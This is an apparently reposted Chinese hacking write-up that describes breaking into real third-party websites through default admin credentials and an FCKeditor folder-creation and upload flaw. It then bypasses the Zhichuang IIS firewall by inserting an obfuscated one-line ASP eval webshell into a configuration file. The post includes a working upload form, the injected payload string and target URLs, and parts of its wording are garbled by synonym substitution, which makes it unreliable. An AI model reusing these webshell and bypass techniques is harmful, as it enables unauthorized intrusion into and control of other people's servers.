|
|
|
联系客服020-83701501

配置文件插马绕过智创IIS防火墙

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
配置文件插马绕过智创IIS防火墙

某天群里发了个布景http://www.91ri.org/? manage/Login.asp,默认希图账号,让扶助上传shell,出于好奇,打开看看
有个数据备份页面,不过被某个装B大黑阔换成为了txt黑页
001.png

数据备份页面被装逼男删除,有上传http://www.91ri.org/ upload.asp,但上传木马POST包被拦挡
002.png

这个站不好办了,旁注吧

找了好几个站,注入也许多,不过好几个MD5破解收费,菜B一个,没钱破解
为了繁冗起见,主要找默认希图密码的,也有几个,不过有的布景无法利用,有的是上传提醒POST包被拦挡

终于后果找到一个站http://www.xxxx.com/
布景http://www.xxxxx.com/manage/login.asp
鼎峰CMS (dfcms),admin+admin新鲜迂腐登录

003.png

看下布景,效率许多,有上传,无数据库备份(不过是自动备份的,不能自界说路径),还有站点根蒂根蒂动态希图(这里也许思索插马),还有Fckeditor编辑器,这下应当冲破几率大了
不过日常平凡上传估计要被拦挡的,数据库备份也利用不上。
配置文件插马思索末端再用,万一插坏了,大概插入新鲜迂腐却被拦挡了,局部站大约就要挂掉了。
有Fckeditor,先尝尝。
先浏览下Media目录
http://www.xxxx.com/ manage/Include/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Media&CurrentFolder=%2F
004.png
没题目,也许浏览
接见会见http://www.xxxx.com/manage/Inclu … nd=CreateFolder&;Type=Media&CurrentFolder=%2Fa.asp&NewFolderName=aaaa&uuid=1279789845662
成立a.asp文件夹
再浏览下Media目录,新鲜迂腐成立a.asp文件夹
005.png

末端构造上传表单

Default
1 <form id="frmUpload" enctype="multipart/form-data" action="http://www.xxxx.com/manage/Include/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=Media&CurrentFolder=%2Fa.asp" method="post">Upload a new file:<br><input type="file" name="NewFile" size="50"><br><input id="btnUpload" type="submit" value="Upload"></form>

上传一句话图片得到shell

http://www.xxxxx.com/uploadfiles/media/a.asp/abc.jpg

 

然则接见会见时出题目了,谁人活该的提醒又出来了

006.png

当前网页常设无法接见会见(防火墙拦挡)

没方法,怎么样办,问了群里人,没人鸟我,那自己百度喽
百度获悉,正本是智创IIS防火墙,看来菜B对这些防御绕过甚么的还有待加强

找到一篇文章,讲怎么样冲破的智创的
当利用IIS分析裂痕的时候就会被认为是恶意脚本,从而被墙掉
接见会见多么的马是会被拦挡的:upload/1.asp/2_asp;jpg
接见会见多么的马不会被拦挡:upload/2.asp;.jpg
多么假定fckeditor的二次上传也许利用的话,那就能冲破了。不幸的是二次上传被修复了
007.png

末端还有一招,即是配置文件插马了
既然上面说拦挡的IIS分析,说明拦挡的不是木马,大概说只要有变形的一句话就大约也许绕过了。
决议用这个变形一句话。

Default
1 <%BBBB=request("aaaa")%><%eval(BBBB)%>

在公司地址反面加上

Default
1 "%><%BBBB=request("aaaa")%><%eval(BBBB)%><%'

008.png

保存,没甚么题目。不知道插入新鲜迂腐没有
页面下方配置文件地址已经给出来了../include/vars.asp
直接接见会见是空白,没报错也没被拦挡
用菜刀连接,新鲜迂腐!!!
009.png

上传个大马尝尝,新鲜迂腐上传,接见会见也也许
多么看来智创只是拦挡IIS分析的题目,而不能识别脚本是不是木马
其它也对上传的POST数据包中止过滤,这里经过配置文件插入变形一句话新鲜迂腐绕过

91ri.org曾发过一篇《绕过智创在线waf持续注入》的文章 不幸的是已经被修复了 不过也许参考着学习思路 大概你能找到更好的方法中止冲破!专程再保举一篇《关于绕过360WAF的几点思路总结》的文章!巴望能帮到当初正在跟waf做斗争的友人!呵呵

参考文:https://forum.90sec.org/redirect.php?tid=3902

本文作者chostrider由网络安全攻防研究室(www.91ri.org)动态安全小组搜集整顿,转载请阐明情由!

数安新闻+更多

证书相关+更多